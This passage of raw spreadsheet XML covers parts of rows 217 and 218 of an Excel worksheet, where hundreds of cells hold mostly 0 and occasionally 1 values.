        <v>0</v>
      </c>
      <c r="JU217">
        <v>0</v>
      </c>
      <c r="JV217">
        <v>0</v>
      </c>
      <c r="JW217">
        <v>0</v>
      </c>
      <c r="JX217">
        <v>0</v>
      </c>
      <c r="JY217">
        <v>0</v>
      </c>
      <c r="JZ217">
        <v>0</v>
      </c>
      <c r="KA217">
        <v>0</v>
      </c>
      <c r="KB217">
        <v>0</v>
      </c>
      <c r="KC217">
        <v>0</v>
      </c>
      <c r="KD217">
        <v>0</v>
      </c>
      <c r="KE217">
        <v>1</v>
      </c>
      <c r="KF217">
        <v>0</v>
      </c>
      <c r="KG217">
        <v>1</v>
      </c>
      <c r="KH217">
        <v>0</v>
      </c>
      <c r="KI217">
        <v>0</v>
      </c>
      <c r="KJ217">
        <v>0</v>
      </c>
      <c r="KK217">
        <v>0</v>
      </c>
      <c r="KL217">
        <v>0</v>
      </c>
      <c r="KM217">
        <v>0</v>
      </c>
      <c r="KN217">
        <v>0</v>
      </c>
      <c r="KO217">
        <v>0</v>
      </c>
      <c r="KP217">
        <v>0</v>
      </c>
      <c r="KQ217">
        <v>0</v>
      </c>
      <c r="KR217">
        <v>0</v>
      </c>
      <c r="KS217">
        <v>0</v>
      </c>
      <c r="KT217">
        <v>0</v>
      </c>
      <c r="KU217">
        <v>0</v>
      </c>
      <c r="KV217">
        <v>0</v>
      </c>
      <c r="KW217">
        <v>0</v>
      </c>
      <c r="KX217">
        <v>0</v>
      </c>
      <c r="KY217">
        <v>0</v>
      </c>
      <c r="KZ217">
        <v>0</v>
      </c>
      <c r="LA217">
        <v>0</v>
      </c>
      <c r="LB217">
        <v>1</v>
      </c>
      <c r="LC217">
        <v>0</v>
      </c>
      <c r="LD217">
        <v>0</v>
      </c>
      <c r="LE217">
        <v>0</v>
      </c>
      <c r="LF217">
        <v>0</v>
      </c>
      <c r="LG217">
        <v>0</v>
      </c>
      <c r="LH217">
        <v>0</v>
      </c>
      <c r="LI217">
        <v>1</v>
      </c>
      <c r="LJ217">
        <v>0</v>
      </c>
      <c r="LK217">
        <v>0</v>
      </c>
      <c r="LL217">
        <v>1</v>
      </c>
      <c r="LM217">
        <v>1</v>
      </c>
      <c r="LN217">
        <v>0</v>
      </c>
      <c r="LO217">
        <v>0</v>
      </c>
      <c r="LP217">
        <v>0</v>
      </c>
      <c r="LQ217">
        <v>0</v>
      </c>
      <c r="LR217">
        <v>0</v>
      </c>
      <c r="LS217">
        <v>0</v>
      </c>
      <c r="LT217">
        <v>0</v>
      </c>
      <c r="LU217">
        <v>0</v>
      </c>
      <c r="LV217">
        <v>0</v>
      </c>
      <c r="LW217">
        <v>1</v>
      </c>
      <c r="LX217">
        <v>0</v>
      </c>
      <c r="LY217">
        <v>0</v>
      </c>
      <c r="LZ217">
        <v>1</v>
      </c>
      <c r="MA217">
        <v>0</v>
      </c>
      <c r="MB217">
        <v>0</v>
      </c>
      <c r="MC217">
        <v>0</v>
      </c>
      <c r="MD217">
        <v>0</v>
      </c>
      <c r="ME217">
        <v>0</v>
      </c>
      <c r="MF217">
        <v>0</v>
      </c>
      <c r="MG217">
        <v>0</v>
      </c>
      <c r="MH217">
        <v>0</v>
      </c>
      <c r="MI217">
        <v>1</v>
      </c>
      <c r="MJ217">
        <v>1</v>
      </c>
      <c r="MK217">
        <v>0</v>
      </c>
      <c r="ML217">
        <v>0</v>
      </c>
      <c r="MM217">
        <v>0</v>
      </c>
      <c r="MN217">
        <v>1</v>
      </c>
      <c r="MO217">
        <v>0</v>
      </c>
      <c r="MP217">
        <v>0</v>
      </c>
      <c r="MQ217">
        <v>0</v>
      </c>
      <c r="MR217">
        <v>0</v>
      </c>
      <c r="MS217">
        <v>0</v>
      </c>
      <c r="MT217">
        <v>0</v>
      </c>
      <c r="MU217">
        <v>0</v>
      </c>
      <c r="MV217">
        <v>1</v>
      </c>
      <c r="MW217">
        <v>0</v>
      </c>
      <c r="MX217">
        <v>0</v>
      </c>
      <c r="MY217">
        <v>0</v>
      </c>
      <c r="MZ217">
        <v>0</v>
      </c>
      <c r="NA217">
        <v>0</v>
      </c>
      <c r="NB217">
        <v>0</v>
      </c>
      <c r="NC217">
        <v>0</v>
      </c>
      <c r="ND217">
        <v>0</v>
      </c>
      <c r="NE217">
        <v>0</v>
      </c>
      <c r="NF217">
        <v>0</v>
      </c>
      <c r="NG217">
        <v>0</v>
      </c>
      <c r="NH217">
        <v>0</v>
      </c>
      <c r="NI217">
        <v>0</v>
      </c>
      <c r="NJ217">
        <v>1</v>
      </c>
      <c r="NK217">
        <v>0</v>
      </c>
      <c r="NL217">
        <v>0</v>
      </c>
      <c r="NM217">
        <v>0</v>
      </c>
      <c r="NN217">
        <v>0</v>
      </c>
      <c r="NO217">
        <v>0</v>
      </c>
      <c r="NP217">
        <v>0</v>
      </c>
      <c r="NQ217">
        <v>0</v>
      </c>
      <c r="NR217">
        <v>0</v>
      </c>
      <c r="NS217">
        <v>0</v>
      </c>
      <c r="NT217">
        <v>1</v>
      </c>
      <c r="NU217">
        <v>0</v>
      </c>
      <c r="NV217">
        <v>1</v>
      </c>
      <c r="NW217">
        <v>1</v>
      </c>
      <c r="NX217">
        <v>0</v>
      </c>
      <c r="NY217">
        <v>0</v>
      </c>
      <c r="NZ217">
        <v>1</v>
      </c>
      <c r="OA217">
        <v>0</v>
      </c>
      <c r="OB217">
        <v>0</v>
      </c>
      <c r="OC217">
        <v>1</v>
      </c>
      <c r="OD217">
        <v>0</v>
      </c>
      <c r="OE217">
        <v>1</v>
      </c>
      <c r="OF217">
        <v>0</v>
      </c>
      <c r="OG217">
        <v>0</v>
      </c>
      <c r="OH217">
        <v>0</v>
      </c>
      <c r="OI217">
        <v>0</v>
      </c>
      <c r="OJ217">
        <v>0</v>
      </c>
      <c r="OK217">
        <v>0</v>
      </c>
      <c r="OL217">
        <v>0</v>
      </c>
      <c r="OM217">
        <v>0</v>
      </c>
      <c r="ON217">
        <v>0</v>
      </c>
      <c r="OO217">
        <v>0</v>
      </c>
      <c r="OP217">
        <v>0</v>
      </c>
      <c r="OQ217">
        <v>0</v>
      </c>
      <c r="OR217">
        <v>0</v>
      </c>
      <c r="OS217">
        <v>0</v>
      </c>
      <c r="OT217">
        <v>0</v>
      </c>
      <c r="OU217">
        <v>0</v>
      </c>
      <c r="OV217">
        <v>0</v>
      </c>
      <c r="OW217">
        <v>0</v>
      </c>
      <c r="OX217">
        <v>0</v>
      </c>
      <c r="OY217">
        <v>0</v>
      </c>
      <c r="OZ217">
        <v>0</v>
      </c>
      <c r="PA217">
        <v>0</v>
      </c>
      <c r="PB217">
        <v>0</v>
      </c>
      <c r="PC217">
        <v>0</v>
      </c>
      <c r="PD217">
        <v>0</v>
      </c>
      <c r="PE217">
        <v>0</v>
      </c>
      <c r="PF217">
        <v>1</v>
      </c>
      <c r="PG217">
        <v>0</v>
      </c>
      <c r="PH217">
        <v>0</v>
      </c>
      <c r="PI217">
        <v>0</v>
      </c>
      <c r="PJ217">
        <v>0</v>
      </c>
      <c r="PK217">
        <v>0</v>
      </c>
      <c r="PL217">
        <v>0</v>
      </c>
      <c r="PM217">
        <v>0</v>
      </c>
      <c r="PN217">
        <v>0</v>
      </c>
      <c r="PO217">
        <v>0</v>
      </c>
      <c r="PP217">
        <v>0</v>
      </c>
      <c r="PQ217">
        <v>0</v>
      </c>
      <c r="PR217">
        <v>0</v>
      </c>
      <c r="PS217">
        <v>0</v>
      </c>
      <c r="PT217">
        <v>0</v>
      </c>
      <c r="PU217">
        <v>1</v>
      </c>
      <c r="PV217">
        <v>0</v>
      </c>
      <c r="PW217">
        <v>0</v>
      </c>
      <c r="PX217">
        <v>0</v>
      </c>
      <c r="PY217">
        <v>0</v>
      </c>
      <c r="PZ217">
        <v>0</v>
      </c>
      <c r="QA217">
        <v>0</v>
      </c>
      <c r="QB217">
        <v>0</v>
      </c>
      <c r="QC217">
        <v>0</v>
      </c>
      <c r="QD217">
        <v>0</v>
      </c>
      <c r="QE217">
        <v>0</v>
      </c>
      <c r="QF217">
        <v>0</v>
      </c>
      <c r="QG217">
        <v>0</v>
      </c>
      <c r="QH217">
        <v>0</v>
      </c>
      <c r="QI217">
        <v>0</v>
      </c>
      <c r="QJ217">
        <v>0</v>
      </c>
      <c r="QK217">
        <v>0</v>
      </c>
      <c r="QL217">
        <v>0</v>
      </c>
      <c r="QM217">
        <v>0</v>
      </c>
      <c r="QN217">
        <v>0</v>
      </c>
      <c r="QO217">
        <v>0</v>
      </c>
      <c r="QP217">
        <v>0</v>
      </c>
      <c r="QQ217">
        <v>0</v>
      </c>
      <c r="QR217">
        <v>0</v>
      </c>
      <c r="QS217">
        <v>1</v>
      </c>
      <c r="QT217">
        <v>0</v>
      </c>
      <c r="QU217">
        <v>0</v>
      </c>
      <c r="QV217">
        <v>0</v>
      </c>
      <c r="QW217">
        <v>0</v>
      </c>
      <c r="QX217">
        <v>0</v>
      </c>
      <c r="QY217">
        <v>0</v>
      </c>
      <c r="QZ217">
        <v>0</v>
      </c>
      <c r="RA217">
        <v>0</v>
      </c>
      <c r="RB217">
        <v>0</v>
      </c>
      <c r="RC217">
        <v>0</v>
      </c>
      <c r="RD217">
        <v>0</v>
      </c>
      <c r="RE217">
        <v>0</v>
      </c>
      <c r="RF217">
        <v>0</v>
      </c>
      <c r="RG217">
        <v>0</v>
      </c>
      <c r="RH217">
        <v>0</v>
      </c>
      <c r="RI217">
        <v>0</v>
      </c>
      <c r="RJ217">
        <v>0</v>
      </c>
      <c r="RK217">
        <v>0</v>
      </c>
      <c r="RL217">
        <v>0</v>
      </c>
      <c r="RM217">
        <v>0</v>
      </c>
      <c r="RN217">
        <v>0</v>
      </c>
      <c r="RO217">
        <v>0</v>
      </c>
      <c r="RP217">
        <v>0</v>
      </c>
      <c r="RQ217">
        <v>0</v>
      </c>
      <c r="RR217">
        <v>0</v>
      </c>
      <c r="RS217">
        <v>0</v>
      </c>
      <c r="RT217">
        <v>0</v>
      </c>
      <c r="RU217">
        <v>0</v>
      </c>
      <c r="RV217">
        <v>1</v>
      </c>
      <c r="RW217">
        <v>0</v>
      </c>
      <c r="RX217">
        <v>0</v>
      </c>
      <c r="RY217">
        <v>0</v>
      </c>
      <c r="RZ217">
        <v>1</v>
      </c>
      <c r="SA217">
        <v>1</v>
      </c>
    </row>
    <row r="218" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A218" s="6" t="s">
        <v>5008</v>
      </c>
      <c r="B218">
        <v>12</v>
      </c>
      <c r="C218">
        <v>0</v>
      </c>
      <c r="D218">
        <v>0</v>
      </c>
      <c r="E218">
        <v>0</v>
      </c>
      <c r="F218">
        <v>1</v>
      </c>
      <c r="G218">
        <v>0</v>
      </c>
      <c r="H218">
        <v>0</v>
      </c>
      <c r="I218">
        <v>0</v>
      </c>
      <c r="J218">
        <v>0</v>
      </c>
      <c r="K218">
        <v>0</v>
      </c>
      <c r="L218">
        <v>0</v>
      </c>
      <c r="M218">
        <v>0</v>
      </c>
      <c r="N218">
        <v>0</v>
      </c>
      <c r="O218">
        <v>0</v>
      </c>
      <c r="P218">
        <v>0</v>
      </c>
      <c r="Q218">
        <v>0</v>
      </c>
      <c r="R218">
        <v>0</v>
      </c>
      <c r="S218">
        <v>0</v>
      </c>
      <c r="T218">
        <v>0</v>
      </c>
      <c r="U218">
        <v>0</v>
      </c>
      <c r="V218">
        <v>0</v>
      </c>
      <c r="W218">
        <v>0</v>
      </c>
      <c r="X218">
        <v>0</v>
      </c>
      <c r="Y218">
        <v>0</v>
      </c>
      <c r="Z218">
        <v>0</v>
      </c>
      <c r="AA218">
        <v>0</v>
      </c>
      <c r="AB218">
        <v>0</v>
      </c>
      <c r="AC218">
        <v>0</v>
      </c>
      <c r="AD218">
        <v>0</v>
      </c>
      <c r="AE218">
        <v>0</v>
      </c>
      <c r="AF218">
        <v>0</v>
      </c>
      <c r="AG218">
        <v>0</v>
      </c>
      <c r="AH218">
        <v>0</v>
      </c>
      <c r="AI218">
        <v>0</v>
      </c>
      <c r="AJ218">
        <v>0</v>
      </c>
      <c r="AK218">
        <v>0</v>
      </c>
      <c r="AL218">
        <v>0</v>
      </c>
      <c r="AM218">
        <v>0</v>
      </c>
      <c r="AN218">
        <v>0</v>
      </c>
      <c r="AO218">
        <v>0</v>
      </c>
      <c r="AP218">
        <v>0</v>
      </c>
      <c r="AQ218">
        <v>0</v>
      </c>
      <c r="AR218">
        <v>0</v>
      </c>
      <c r="AS218">
        <v>0</v>
      </c>
      <c r="AT218">
        <v>0</v>
      </c>
      <c r="AU218">
        <v>0</v>
      </c>
      <c r="AV218">
        <v>0</v>
      </c>
      <c r="AW218">
        <v>0</v>
      </c>
      <c r="AX218">
        <v>0</v>
      </c>
      <c r="AY218">
        <v>0</v>
      </c>
      <c r="AZ218">
        <v>0</v>
      </c>
      <c r="BA218">
        <v>0</v>
      </c>
      <c r="BB218">
        <v>0</v>
      </c>
      <c r="BC218">
        <v>0</v>
      </c>
      <c r="BD218">
        <v>0</v>
      </c>
      <c r="BE218">
        <v>0</v>
      </c>
      <c r="BF218">
        <v>0</v>
      </c>
      <c r="BG218">
        <v>0</v>
      </c>
      <c r="BH218">
        <v>0</v>
      </c>
      <c r="BI218">
        <v>0</v>
      </c>
      <c r="BJ218">
        <v>0</v>
      </c>
      <c r="BK218">
        <v>0</v>
      </c>
      <c r="BL218">
        <v>0</v>
      </c>
      <c r="BM218">
        <v>0</v>
      </c>
      <c r="BN218">
        <v>0</v>
      </c>
      <c r="BO218">
        <v>0</v>
      </c>
      <c r="BP218">
        <v>0</v>
      </c>
      <c r="BQ218">
        <v>0</v>
      </c>
      <c r="BR218">
        <v>0</v>
      </c>
      <c r="BS218">
        <v>0</v>
      </c>
      <c r="BT218">
        <v>0</v>
      </c>
      <c r="BU218">
        <v>0</v>
      </c>
      <c r="BV218">
        <v>0</v>
      </c>
      <c r="BW218">
        <v>0</v>
      </c>
      <c r="BX218">
        <v>1</v>
      </c>
      <c r="BY218">
        <v>0</v>
      </c>
      <c r="BZ218">
        <v>0</v>
      </c>
      <c r="CA218">
        <v>1</v>
      </c>
      <c r="CB218">
        <v>0</v>
      </c>
      <c r="CC218">
        <v>0</v>
      </c>
      <c r="CD218">
        <v>0</v>
      </c>
      <c r="CE218">
        <v>0</v>
      </c>
      <c r="CF218">
        <v>0</v>
      </c>
      <c r="CG218">
        <v>0</v>
      </c>
      <c r="CH218">
        <v>0</v>
      </c>
      <c r="CI218">
        <v>0</v>
      </c>
      <c r="CJ218">
        <v>0</v>
      </c>
      <c r="CK218">
        <v>0</v>
      </c>
      <c r="CL218">
        <v>0</v>
      </c>
      <c r="CM218">
        <v>0</v>
      </c>
      <c r="CN218">
        <v>0</v>
      </c>
      <c r="CO218">
        <v>0</v>
      </c>
      <c r="CP218">
        <v>0</v>
      </c>
      <c r="CQ218">
        <v>0</v>
      </c>
      <c r="CR218">
        <v>0</v>
      </c>
      <c r="CS218">
        <v>0</v>
      </c>
      <c r="CT218">
        <v>0</v>
      </c>
      <c r="CU218">
        <v>1</v>
      </c>
      <c r="CV218">
        <v>0</v>
      </c>
      <c r="CW218">
        <v>0</v>
      </c>
      <c r="CX218">
        <v>0</v>
      </c>
      <c r="CY218">
        <v>0</v>
      </c>
      <c r="CZ218">
        <v>0</v>
      </c>
      <c r="DA218">
        <v>0</v>
      </c>
      <c r="DB218">
        <v>0</v>
      </c>
      <c r="DC218">
        <v>0</v>
      </c>
      <c r="DD218">
        <v>0</v>
      </c>
      <c r="DE218">
        <v>0</v>
      </c>
      <c r="DF218">
        <v>0</v>
      </c>
      <c r="DG218">
        <v>0</v>
      </c>
      <c r="DH218">
        <v>0</v>
      </c>
      <c r="DI218">
        <v>0</v>
      </c>
      <c r="DJ218">
        <v>0</v>
      </c>
      <c r="DK218">
        <v>0</v>
      </c>
      <c r="DL218">
        <v>0</v>
      </c>
      <c r="DM218">
        <v>0</v>
      </c>
      <c r="DN218">
        <v>0</v>
      </c>
      <c r="DO218">
        <v>0</v>
      </c>
      <c r="DP218">
        <v>0</v>
      </c>
      <c r="DQ218">
        <v>0</v>
      </c>
      <c r="DR218">
        <v>0</v>
      </c>
      <c r="DS218">
        <v>0</v>
      </c>
      <c r="DT218">
        <v>0</v>
      </c>
      <c r="DU218">
        <v>0</v>
      </c>
      <c r="DV218">
        <v>0</v>
      </c>
      <c r="DW218">
        <v>0</v>
      </c>
      <c r="DX218">
        <v>0</v>
      </c>
      <c r="DY218">
        <v>0</v>
      </c>
      <c r="DZ218">
        <v>0</v>
      </c>
      <c r="EA218">
        <v>0</v>
      </c>
      <c r="EB218">
        <v>0</v>
      </c>
      <c r="EC218">
        <v>0</v>
      </c>
      <c r="ED218">
        <v>0</v>
      </c>
      <c r="EE218">
        <v>0</v>
      </c>
      <c r="EF218">
        <v>0</v>
      </c>
      <c r="EG218">
        <v>0</v>
      </c>
      <c r="EH218">
        <v>0</v>
      </c>
      <c r="EI218">
        <v>0</v>
      </c>
      <c r="EJ218">
        <v>0</v>
      </c>
      <c r="EK218">
        <v>0</v>
      </c>
      <c r="EL218">
        <v>0</v>
      </c>
      <c r="EM218">
        <v>0</v>
      </c>
      <c r="EN218">
        <v>0</v>
      </c>
      <c r="EO218">
        <v>0</v>
      </c>
      <c r="EP218">
        <v>0</v>
      </c>
      <c r="EQ218">
        <v>0</v>
      </c>
      <c r="ER218">
        <v>0</v>
      </c>
      <c r="ES218">
        <v>0</v>
      </c>
      <c r="ET218">
        <v>0</v>
      </c>
      <c r="EU218">
        <v>0</v>
      </c>
      <c r="EV218">
        <v>0</v>
      </c>
      <c r="EW218">
        <v>0</v>
      </c>
      <c r="EX218">
        <v>0</v>
      </c>
      <c r="EY218">
        <v>0</v>
      </c>
      <c r="EZ218">
        <v>0</v>
      </c>
      <c r="FA218">
        <v>0</v>
      </c>
      <c r="FB218">
        <v>0</v>
      </c>
      <c r="FC218">
        <v>0</v>
      </c>
      <c r="FD218">
        <v>0</v>
      </c>
      <c r="FE218">
        <v>0</v>
      </c>
      <c r="FF218">
        <v>0</v>
      </c>
      <c r="FG218">
        <v>0</v>
      </c>
      <c r="FH218">
        <v>0</v>
      </c>
      <c r="FI218">
        <v>0</v>
      </c>
      <c r="FJ218">
        <v>0</v>
      </c>
      <c r="FK218">
        <v>0</v>
      </c>
      <c r="FL218">
        <v>0</v>
      </c>
      <c r="FM218">
        <v>0</v>
      </c>
      <c r="FN218">
        <v>0</v>
      </c>
      <c r="FO218">
        <v>0</v>
      </c>
      <c r="FP218">
        <v>0</v>
      </c>
      <c r="FQ218">
        <v>0</v>
      </c>
      <c r="FR218">
        <v>0</v>
      </c>
      <c r="FS218">
        <v>0</v>
      </c>
      <c r="FT218">
        <v>0</v>
      </c>
      <c r="FU218">
        <v>0</v>
      </c>
      <c r="FV218">
        <v>0</v>
      </c>
      <c r="FW218">
        <v>0</v>
      </c>
      <c r="FX218">
        <v>0</v>
      </c>
      <c r="FY218">
        <v>0</v>
      </c>
      <c r="FZ218">
        <v>0</v>
      </c>
      <c r="GA218">
        <v>0</v>
      </c>
      <c r="GB218">
        <v>0</v>
      </c>
      <c r="GC218">
        <v>0</v>
      </c>
      <c r="GD218">
        <v>0</v>
      </c>
      <c r="GE218">
        <v>0</v>
      </c>
      <c r="GF218">
        <v>0</v>
      </c>
      <c r="GG218">
        <v>0</v>
      </c>
      <c r="GH218">
        <v>0</v>
      </c>
      <c r="GI218">
        <v>0</v>
      </c>
      <c r="GJ218">
        <v>0</v>
      </c>
      <c r="GK218">
        <v>0</v>
      </c>
      <c r="GL218">
        <v>0</v>
      </c>
      <c r="GM218">
        <v>0</v>
      </c>
      <c r="GN218">
        <v>0</v>
      </c>
      <c r="GO218">
        <v>0</v>
      </c>
      <c r="GP218">
        <v>0</v>
      </c>
      <c r="GQ218">
        <v>0</v>
      </c>
      <c r="GR218">
        <v>0</v>
      </c>
      <c r="GS218">
        <v>0</v>
      </c>
      <c r="GT218">
        <v>0</v>
      </c>
      <c r="GU218">
        <v>1</v>
      </c>
      <c r="GV218">
        <v>0</v>
      </c>
      <c r="GW218">
        <v>0</v>
      </c>
      <c r="GX218">
        <v>0</v>
      </c>
      <c r="GY218">
        <v>0</v>
      </c>
      <c r="GZ218">
        <v>0</v>
      </c>
      <c r="HA218">
        <v>0</v>
      </c>
      <c r="HB218">
        <v>0</v>
      </c>
      <c r="HC218">
        <v>0</v>
      </c>
      <c r="HD218">
        <v>0</v>
      </c>
      <c r="HE218">
        <v>0</v>
      </c>
      <c r="HF218">
        <v>0</v>
      </c>
      <c r="HG218">
        <v>1</v>
      </c>
      <c r="HH218">
        <v>1</v>
      </c>
      <c r="HI218">
        <v>0</v>
      </c>
      <c r="HJ218">
        <v>0</v>
      </c>
      <c r="HK218">
        <v>0</v>
      </c>
      <c r="HL218">
        <v>0</v>
      </c>
      <c r="HM218">
        <v>0</v>
      </c>
      <c r="HN218">
        <v>0</v>
      </c>
      <c r="HO218">
        <v>0</v>
      </c>
      <c r="HP218">
        <v>0</v>
      </c>
      <c r="HQ218">
        <v>0</v>
      </c>
      <c r="HR218">
        <v>0</v>
      </c>
      <c r="HS218">
        <v>0</v>
      </c>
      <c r="HT218">
        <v>0</v>
      </c>
      <c r="HU218">
        <v>0</v>
      </c>
      <c r="HV218">
        <v>1</v>
      </c>
      <c r="HW218">
        <v>0</v>
      </c>
      <c r="HX218">
        <v>0</v>
      </c>
      <c r="HY218">
        <v>0</v>
      </c>
      <c r="HZ218">
        <v>0</v>
      </c>
      <c r="IA218">
        <v>0</v>
      </c>
      <c r="IB218">
        <v>0</v>
      </c>
      <c r="IC218">
        <v>0</v>
      </c>
      <c r="ID218">
        <v>0</v>
      </c>
      <c r="IE218">
        <v>0</v>
      </c>
      <c r="IF218">
        <v>0</v>
      </c>
      <c r="IG218">
        <v>0</v>
      </c>
      <c r="IH218">
        <v>0</v>
      </c>
      <c r="II218">
        <v>0</v>
      </c>
      <c r="IJ218">
        <v>0</v>
      </c>
      <c r="IK218">
        <v>0</v>
      </c>
      <c r="IL218">
        <v>0</v>
      </c>
      <c r="IM218">
        <v>0</v>
      </c>
      <c r="IN218">
        <v>0</v>
      </c>
      <c r="IO218">
        <v>0</v>
      </c>
      <c r="IP218">
        <v>0</v>
      </c>
      <c r="IQ218">
        <v>0</v>
      </c>
      <c r="IR218">
        <v>0</v>
      </c>
      <c r="IS218">
        <v>0</v>
      </c>
      <c r="IT218">
        <v>0</v>
      </c>
      <c r="IU218">
        <v>0</v>
      </c>
      <c r="IV218">
        <v>0</v>
      </c>
      <c r="IW218">
        <v>0</v>
      </c>
      <c r="IX218">
        <v>0</v>
      </c>
      <c r="IY218">
        <v>0</v>
      </c>
      <c r="IZ218">
        <v>0</v>
      </c>
      <c r="JA218">
        <v>0</v>
      </c>
      <c r="JB218">
        <v>0</v>
      </c>
      <c r="JC218">
        <v>0</v>
      </c>
      <c r="JD218">
        <v>0</v>
      </c>
      <c r="JE218">
        <v>0</v>
      </c>
      <c r="JF218">
        <v>0</v>
      </c>
      <c r="JG218">
        <v>0</v>
      </c>
      <c r="JH218">
        <v>0</v>
      </c>
      <c r="JI218">
        <v>0</v>
      </c>
      <c r="JJ218">
        <v>0</v>
      </c>
      <c r="JK218">
        <v>0</v>
      </c>
      <c r="JL218">
        <v>0</v>
      </c>
      <c r="JM218">
        <v>0</v>
      </c>
      <c r="JN218">
        <v>0</v>
      </c>
      <c r="JO218">
        <v>0</v>
      </c>
      <c r="JP218">
        <v>0</v>
      </c>
      <c r="JQ218">
        <v>0</v>
      </c>
      <c r="JR218">
        <v>0</v>
      </c>
      <c r="JS218">
        <v>0</v>
      </c>
      <c r="JT218">
        <v>0</v>
      </c>
      <c r="JU218">
        <v>0</v>
      </c>
      <c r="JV218">
        <v>0</v>
      </c>
      <c r="JW218">
        <v>0</v>
      </c>
      <c r="JX218">
        <v>0</v>
      </c>
      <c r="JY218">
        <v>0</v>
      </c>
      <c r="JZ218">
        <v>0</v>
      </c>
      <c r="KA218">
        <v>0</v>
      </c>
      <c r="KB218">
        <v>0</v>
      </c>
      <c r="KC218">
        <v>0</v>
      </c>
      <c r="KD218">
        <v>0</v>
      </c>
      <c r="KE218">
        <v>1</v>
      </c>
      <c r="KF218">
        <v>0</v>
      </c>
      <c r="KG218">
        <v>0</v>
      </c>
      <c r="KH218">
        <v>0</v>
      </c>
      <c r="KI218">
        <v>0</v>
      </c>
      <c r="KJ218">
        <v>0</v>
      </c>
      <c r="KK218">
        <v>0</v>
      </c>
      <c r="KL218">
        <v>0</v>
      </c>
      <c r="KM218">
        <v>0</v>
      </c>
      <c r="KN218">
        <v>0</v>
      </c>
      <c r="KO218">
        <v>0</v>
      </c>
      <c r="KP218">
        <v>0</v>
      </c>
      <c r="KQ218">
        <v>0</v>
      </c>
      <c r="KR218">
        <v>0</v>
      </c>
      <c r="KS218">
        <v>0</v>
      </c>
      <c r="KT218">
        <v>0</v>
      </c>
      <c r="KU218">
        <v>0</v>
      </c>
      <c r="KV218">
        <v>0</v>
      </c>
      <c r="KW218">
        <v>0</v>
      </c>
      <c r="KX218">
        <v>0</v>
      </c>
      <c r="KY218">
        <v>0</v>
      </c>
      <c r="KZ218">
        <v>0</v>
      </c>
      <c r="LA218">
        <v>0</v>
      </c>
      <c r="LB218">
        <v>0</v>
      </c>
      <c r="LC218">
        <v>0</v>
      </c>
      <c r="LD218">
        <v>0</v>
      </c>
      <c r="LE218">
        <v>0</v>
      </c>
      <c r="LF218">
        <v>0</v>
      </c>
      <c r="LG218">
        <v>0</v>
      </c>
      <c r="LH218">
        <v>0</v>
      </c>
      <c r="LI218">
        <v>0</v>
      </c>
      <c r="LJ218">
        <v>0</v>
      </c>
      <c r="LK218">
        <v>0</v>
      </c>
      <c r="LL218">
        <v>0</v>
      </c>
      <c r="LM218">
        <v>0</v>
      </c>
      <c r="LN218">
        <v>0</v>
      </c>
      <c r="LO218">
        <v>0</v>
      </c>
      <c r="LP218">
        <v>0</v>
      </c>
      <c r="LQ218">
        <v>0</v>
      </c>
      <c r="LR218">
        <v>0</v>
      </c>
      <c r="LS218">
        <v>0</v>
      </c>
      <c r="LT218">
        <v>0</v>
      </c>
      <c r="LU218">
        <v>0</v>
      </c>
      <c r="LV218">
        <v>0</v>
      </c>
      <c r="LW218">
        <v>0</v>
      </c>
      <c r="LX218">
        <v>0</v>
      </c>
      <c r="LY218">
        <v>0</v>
      </c>
      <c r="LZ218">
        <v>0</v>
      </c>
      <c r="MA218">
        <v>0</v>
      </c>
      <c r="MB218">
        <v>0</v>
      </c>
      <c r="MC218">
        <v>0</v>
      </c>
      <c r="MD218">
        <v>0</v>
      </c>
      <c r="ME218">
        <v>0</v>
      </c>
      <c r="MF218">
        <v>0</v>
      </c>
      <c r="MG218">
        <v>0</v>
      </c>
      <c r="MH218">
        <v>0</v>
      </c>
      <c r="MI218">
        <v>0</v>
      </c>
      <c r="MJ218">
        <v>0</v>
      </c>
      <c r="MK218">
        <v>0</v>
      </c>
      <c r="ML218">
        <v>0</v>
      </c>
      <c r="MM218">
        <v>0</v>
      </c>
      <c r="MN218">
        <v>0</v>
      </c>
      <c r="MO218">
        <v>0</v>
      </c>
      <c r="MP218">
        <v>0</v>
      </c>
      <c r="MQ218">
        <v>0</v>
      </c>
      <c r="MR218">
        <v>0</v>
      </c>
      <c r="MS218">
        <v>0</v>
      </c>
      <c r="MT218">
        <v>0</v>
      </c>
      <c r="MU218">
        <v>0</v>
      </c>
      <c r="MV218">
        <v>0</v>
      </c>
      <c r="MW218">
        <v>0</v>
      </c>
      <c r="MX218">
        <v>0</v>
      </c>
      <c r="MY218">
        <v>0</v>
      </c>
      <c r="MZ218">
        <v>0</v>
      </c>
      <c r="NA218">
        <v>0</v>
      </c>
      <c r="NB218">
        <v>0</v>
      </c>
      <c r="NC218">
        <v>0</v>
      </c>
      <c r="ND218">
        <v>0</v>
      </c>
      <c r="NE218">
        <v>0</v>
      </c>
      <c r="NF218">
        <v>0</v>
      </c>
      <c r="NG218">
        <v>0</v>
      </c>
      <c r="NH218">
        <v>0</v>
      </c>
      <c r="NI218">
        <v>0</v>
      </c>
      <c r="NJ218">
        <v>0</v>
      </c>
      <c r="NK218">
        <v>0</v>
      </c>
      <c r="NL218">
        <v>0</v>
      </c>
      <c r="NM218">
        <v>0</v>
      </c>
      <c r="NN218">
        <v>0</v>
      </c>
      <c r="NO218">
        <v>0</v>
      </c>
      <c r="NP218">
        <v>0</v>
      </c>
      <c r="NQ218">
        <v>0</v>
      </c>
      <c r="NR218">
        <v>0</v>
      </c>
      <c r="NS218">
        <v>0</v>
      </c>
      <c r="NT218">
        <v>0</v>
      </c>
      <c r="NU218">
        <v>1</v>
      </c>
      <c r="NV218">
        <v>0</v>
      </c>
      <c r="NW218">
        <v>0</v>
      </c>
      <c r="NX218">
        <v>1</v>
      </c>
      <c r="NY218">
        <v>0</v>
      </c>
      <c r="NZ218">
        <v>0</v>
      </c>
      <c r="OA218">
        <v>0</v>
      </c>
      <c r="OB218">
        <v>0</v>
      </c>
      <c r="OC218">
        <v>0</v>
      </c>
      <c r="OD218">
        <v>0</v>
      </c>
      <c r="OE218">
        <v>0</v>
      </c>
      <c r="OF218">
        <v>0</v>
      </c>
      <c r="OG218">
        <v>0</v>
      </c>
      <c r="OH218">
        <v>0</v>
      </c>
      <c r="OI218">
        <v>0</v>
      </c>
      <c r="OJ218">
        <v>0</v>
      </c>
      <c r="OK218">
        <v>0</v>
      </c>
      <c r="OL218">
        <v>0</v>
      </c>
      <c r="OM218">
        <v>0</v>
      </c>
      <c r="ON218">
        <v>0</v>
      </c>
      <c r="OO218">
        <v>0</v>
      </c>
      <c r="OP218">
